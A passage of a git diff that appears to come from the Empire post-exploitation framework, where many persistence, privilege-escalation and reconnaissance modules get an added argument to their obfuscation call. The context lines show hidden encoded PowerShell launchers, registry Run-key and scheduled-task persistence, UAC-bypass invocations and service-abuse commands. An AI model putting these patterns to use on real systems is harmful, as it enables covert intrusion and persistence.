agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -196,6 +196,6 @@ Invoke-DeadUserBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py index eab55ee..faa4236 100644 --- a/lib/modules/powershell/persistence/powerbreach/eventlog.py +++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py @@ -160,7 +160,7 @@ Invoke-EventLogBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -171,7 +171,7 @@ Invoke-EventLogBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) print scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py index 554a3cc..c26a99a 100644 --- a/lib/modules/powershell/persistence/powerbreach/resolver.py +++ b/lib/modules/powershell/persistence/powerbreach/resolver.py @@ -172,7 +172,7 @@ Invoke-ResolverBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -183,5 +183,5 @@ Invoke-ResolverBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/userland/backdoor_lnk.py b/lib/modules/powershell/persistence/userland/backdoor_lnk.py index 87e8009..822f03c 100644 --- a/lib/modules/powershell/persistence/userland/backdoor_lnk.py +++ b/lib/modules/powershell/persistence/userland/backdoor_lnk.py @@ -180,6 +180,6 @@ class Module: scriptEnd += " -EncScript '%s'" %(encScript) scriptEnd += "; \"Invoke-BackdoorLNK run on path '%s' with stager for listener '%s'\"" %(lnkPath,listenerName) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/userland/registry.py b/lib/modules/powershell/persistence/userland/registry.py index 651a008..57042d2 100644 --- a/lib/modules/powershell/persistence/userland/registry.py +++ b/lib/modules/powershell/persistence/userland/registry.py @@ -149,7 +149,7 @@ class Module: script += "Remove-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";" script += "'Registry Persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -236,5 +236,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/userland/schtasks.py b/lib/modules/powershell/persistence/userland/schtasks.py index 2abed9e..e4adc53 100644 --- a/lib/modules/powershell/persistence/userland/schtasks.py +++ b/lib/modules/powershell/persistence/userland/schtasks.py @@ -155,7 +155,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -234,5 +234,5 @@ class Module: script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/ask.py b/lib/modules/powershell/privesc/ask.py index a1bb865..83992a1 100644 --- a/lib/modules/powershell/privesc/ask.py +++ b/lib/modules/powershell/privesc/ask.py @@ -113,5 +113,5 @@ else { } ''' %(encLauncher) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/bypassuac.py b/lib/modules/powershell/privesc/bypassuac.py index f24cea2..2ecdaaf 100644 --- a/lib/modules/powershell/privesc/bypassuac.py +++ b/lib/modules/powershell/privesc/bypassuac.py @@ -115,6 +115,6 @@ class Module: else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_eventvwr.py b/lib/modules/powershell/privesc/bypassuac_eventvwr.py index fcbbb10..85fb4f2 100644 --- a/lib/modules/powershell/privesc/bypassuac_eventvwr.py +++ b/lib/modules/powershell/privesc/bypassuac_eventvwr.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 2ac1c2f..0606e5c 100644 --- a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py @@ -158,7 +158,7 @@ class Module: except Exception as e: pass if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_wscript.py b/lib/modules/powershell/privesc/bypassuac_wscript.py index 122d681..48649b2 100644 --- a/lib/modules/powershell/privesc/bypassuac_wscript.py +++ b/lib/modules/powershell/privesc/bypassuac_wscript.py @@ -112,6 +112,6 @@ class Module: else: scriptEnd = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/getsystem.py b/lib/modules/powershell/privesc/getsystem.py index c34f848..c8ebaf9 100644 --- a/lib/modules/powershell/privesc/getsystem.py +++ b/lib/modules/powershell/privesc/getsystem.py @@ -115,6 +115,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-System completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/gpp.py b/lib/modules/powershell/privesc/gpp.py index 8cdf96a..fbb929c 100644 --- a/lib/modules/powershell/privesc/gpp.py +++ b/lib/modules/powershell/privesc/gpp.py @@ -83,6 +83,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-GPPPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/mcafee_sitelist.py b/lib/modules/powershell/privesc/mcafee_sitelist.py index 33a4a51..dc07331 100644 --- a/lib/modules/powershell/privesc/mcafee_sitelist.py +++ b/lib/modules/powershell/privesc/mcafee_sitelist.py @@ -82,6 +82,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-SiteListPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-032.py b/lib/modules/powershell/privesc/ms16-032.py index bc740b2..a78fb84 100644 --- a/lib/modules/powershell/privesc/ms16-032.py +++ b/lib/modules/powershell/privesc/ms16-032.py @@ -101,6 +101,6 @@ class Module: scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"' scriptEnd += ';`nInvoke-MS16032 completed.' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-135.py b/lib/modules/powershell/privesc/ms16-135.py index 5ce5527..7700817 100644 --- a/lib/modules/powershell/privesc/ms16-135.py +++ b/lib/modules/powershell/privesc/ms16-135.py @@ -102,5 +102,5 @@ class Module: script += 'Invoke-MS16135 -Command "' + launcherCode + '"' script += ';`nInvoke-MS16135 completed.' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/powerup/allchecks.py b/lib/modules/powershell/privesc/powerup/allchecks.py index d299c2d..31dd7c4 100644 --- a/lib/modules/powershell/privesc/powerup/allchecks.py +++ b/lib/modules/powershell/privesc/powerup/allchecks.py @@ -85,6 +85,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/find_dllhijack.py b/lib/modules/powershell/privesc/powerup/find_dllhijack.py index 190f421..326d3f2 100644 --- a/lib/modules/powershell/privesc/powerup/find_dllhijack.py +++ b/lib/modules/powershell/privesc/powerup/find_dllhijack.py @@ -100,6 +100,6 @@ class Module: scriptEnd += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_restore.py b/lib/modules/powershell/privesc/powerup/service_exe_restore.py index 5d3b979..d7c00d9 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_restore.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_restore.py @@ -95,6 +95,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_stager.py b/lib/modules/powershell/privesc/powerup/service_exe_stager.py index c752eee..83da5b2 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_stager.py @@ -128,6 +128,6 @@ class Module: else: scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py index f966dfe..2e2e1fe 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py @@ -106,6 +106,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_stager.py b/lib/modules/powershell/privesc/powerup/service_stager.py index 1585cfd..044fb8f 100644 --- a/lib/modules/powershell/privesc/powerup/service_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_stager.py @@ -121,6 +121,6 @@ class Module: scriptEnd += "Invoke-ServiceAbuse -ServiceName \""+serviceName+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_useradd.py b/lib/modules/powershell/privesc/powerup/service_useradd.py index df9701b..3ed8c4e 100644 --- a/lib/modules/powershell/privesc/powerup/service_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_useradd.py @@ -104,6 +104,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py index e77e177..d123d4e 100644 --- a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py @@ -122,6 +122,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/tater.py b/lib/modules/powershell/privesc/tater.py index ff525c9..e46df21 100644 --- a/lib/modules/powershell/privesc/tater.py +++ b/lib/modules/powershell/privesc/tater.py @@ -155,6 +155,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/find_fruit.py b/lib/modules/powershell/recon/find_fruit.py index dbca367..65f0b7a 100644 --- a/lib/modules/powershell/recon/find_fruit.py +++ b/lib/modules/powershell/recon/find_fruit.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Format-Table -AutoSize | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 948c69a..943ed5b 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -102,6 +102,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/recon/http_login.py b/lib/modules/powershell/recon/http_login.py index b74f5b1..2b39a7d 100644 --- a/lib/modules/powershell/recon/http_login.py +++ b/lib/modules/powershell/recon/http_login.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py index 3d58f84..db0f2c8 100644 --- a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py +++ b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py @@ -101,5 +101,5 @@ Get-AntiVirusProduct """ script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(self.info["Name"])+' completed!";' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/computerdetails.py b/lib/modules/powershell/situational_awareness/host/computerdetails.py index 1c51f85..808a3ef 100644 --- a/lib/modules/powershell/situational_awareness/host/computerdetails.py +++ b/lib/modules/powershell/situational_awareness/host/computerdetails.py @@ -107,7 +107,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4624 (Logon):`n";' scriptEnd += "Write-Output $Filtered4624.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "4648": @@ -115,7 +115,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";' scriptEnd += "Write-Output $Filtered4648.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "AppLocker": @@ -123,7 +123,7 @@ class Module: scriptEnd += 'Write-Output "AppLocker Process Starts:`n";' scriptEnd += "Write-Output $AppLockerLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "PSLogs": @@ -131,7 +131,7 @@ class Module: scriptEnd += 'Write-Output "PowerShell Script Executions:`n";' scriptEnd += "Write-Output $PSLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "SavedRDP": @@ -139,13 +139,13 @@ class Module: scriptEnd += 'Write-Output "RDP Client Data:`n";' scriptEnd += "Write-Output $RdpClientData.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script # if we get to this point, no switched were specified scriptEnd += "Get-ComputerDetails -Limit " + str(self.options['Limit']['Value']) + " -ToString" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/dnsserver.py b/lib/modules/powershell/situational_awareness/host/dnsserver.py index acdcdae..8c9b0a2 100644 --- a/lib/modules/powershell/situational_awareness/host/dnsserver.py +++ b/lib/modules/powershell/situational_awareness/host/dnsserver.py @@ -101,5 +101,5 @@ function Get-SystemDNSServer else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py index 364d877..cb6feda 100644 --- a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py +++ b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py @@ -82,6 +82,6 @@ class Module: script = moduleCode scriptEnd = "Find-TrustedDocuments" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/get_pathacl.py b/lib/modules/powershell/situational_awareness/host/get_pathacl.py index 00ab99a..5511c2b 100644 --- a/lib/modules/powershell/situational_awareness/host/get_pathacl.py +++ b/lib/modules/powershell/situational_awareness/host/get_pathacl.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/get_proxy.py b/lib/modules/powershell/situational_awareness/host/get_proxy.py index 71eecb6..fe5997a 100644 --- a/lib/modules/powershell/situational_awareness/host/get_proxy.py +++ b/lib/modules/powershell/situational_awareness/host/get_proxy.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 1939a24..e749366 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py @@ -116,6 +116,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/paranoia.py b/lib/modules/powershell/situational_awareness/host/paranoia.py index 253971e..4540894 100644 --- a/lib/modules/powershell/situational_awareness/host/paranoia.py +++ b/lib/modules/powershell/situational_awareness/host/paranoia.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/winenum.py b/lib/modules/powershell/situational_awareness/host/winenum.py index fd0583d..f8252c5 100644 --- a/lib/modules/powershell/situational_awareness/host/winenum.py +++ b/lib/modules/powershell/situational_awareness/host/winenum.py @@ -90,6 +90,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/arpscan.py b/lib/modules/powershell/situational_awareness/network/arpscan.py index 387b496..345372f 100644 --- a/lib/modules/powershell/situational_awareness/network/arpscan.py +++ b/lib/modules/powershell/situational_awareness/network/arpscan.py @@ -91,6 +91,6 @@ class Module: scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/bloodhound.py b/lib/modules/powershell/situational_awareness/network/bloodhound.py index d080099..7506a5a 100644 --- a/lib/modules/powershell/situational_awareness/network/bloodhound.py +++ b/lib/modules/powershell/situational_awareness/network/bloodhound.py @@ -159,7 +159,7 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py index 4563d5a..99163e9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py +++ b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py @@ -113,5 +113,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/get_spn.py b/lib/modules/powershell/situational_awareness/network/get_spn.py index 9fce9ca..b9c00f4 100644 --- a/lib/modules/powershell/situational_awareness/network/get_spn.py +++ b/lib/modules/powershell/situational_awareness/network/get_spn.py @@ -93,6 +93,6 @@ class Module: scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index dbf5362..8996ab7 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -118,6 +118,6 @@ class Module: if udpTimeOut != "": scriptEnd += " -UDPTimeOut "+udpTimeOut if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = 